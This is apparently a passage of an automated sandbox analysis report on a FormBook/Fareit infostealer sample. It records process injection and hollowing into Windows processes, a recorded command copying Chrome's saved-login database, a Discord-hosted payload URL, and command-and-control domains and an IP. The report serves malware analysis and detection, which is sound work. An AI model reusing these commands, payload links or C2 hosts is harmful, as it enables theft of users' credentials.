Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C38DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C03540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C0A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C58ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C1FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B976E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C50EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C50EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C50EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C046A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BAAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B97E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C3FE3F mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\SysWOW64\secinit.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe

Code function: 21_2_00F11C41 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: vp21b7dsh.exe.3.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.589man.com
Source: C:\Windows\explorer.exe	Network Connect: 199.192.24.139 80
Source: C:\Windows\explorer.exe	Domain query: www.joomlas123.info

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 10410000 protect: page execute and read and write
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2DD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 2DE0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 2DE0000

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Memory written: C:\Windows\SysWOW64\secinit.exe base: 10410000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\secinit.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\secinit.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3424

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\secinit.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Windows\SysWOW64\secinit.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1090000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 10410000
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 2DD0000
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Memory written: C:\Windows\SysWOW64\secinit.exe base: 2DE0000

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\secinit.exe'
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: explorer.exe, 00000003.00000002.920574609.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.693663769.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000A.00000002.923246827.0000000003E70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.713034911.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe

Code function: 21_2_00F11B03 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder1	Process Injection912	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution1	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Obfuscated Files or Information3	Credential API Hooking1	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	Security Software Discovery121	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rootkit1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection912	Proc Filesystem	System Network Configuration Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
f97e137e_by_Libranalysis.exe	26%	Virustotal		Browse
f97e137e_by_Libranalysis.exe	30%	ReversingLabs	Win32.Infostealer.Fareit
f97e137e_by_Libranalysis.exe	100%	Avira	HEUR/AGEN.1104239

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	0%	Virustotal	Browse
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	0%	Metadefender	Browse
C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.secinit.exe.10410000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
0.0.f97e137e_by_Libranalysis.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1104239		Download File

Domains

Source	Detection	Scanner	Link
www.joomlas123.info	10%	Virustotal	Browse
www.589man.com	1%	Virustotal	Browse
www.beepot.tech	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
www.joomlas123.info/3nop/	14%	Virustotal		Browse
www.joomlas123.info/3nop/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.joomlas123.info/3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.134.233	true	false		high
www.joomlas123.info	199.192.24.139	true	true	10%, Virustotal, Browse	unknown
www.589man.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.beepot.tech	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.joomlas123.info/3nop/	true	14%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.joomlas123.info/3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydcl	f97e137e_by_Libranalysis.exe, 00000000.00000003.653912925.0000000000789000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	false		high
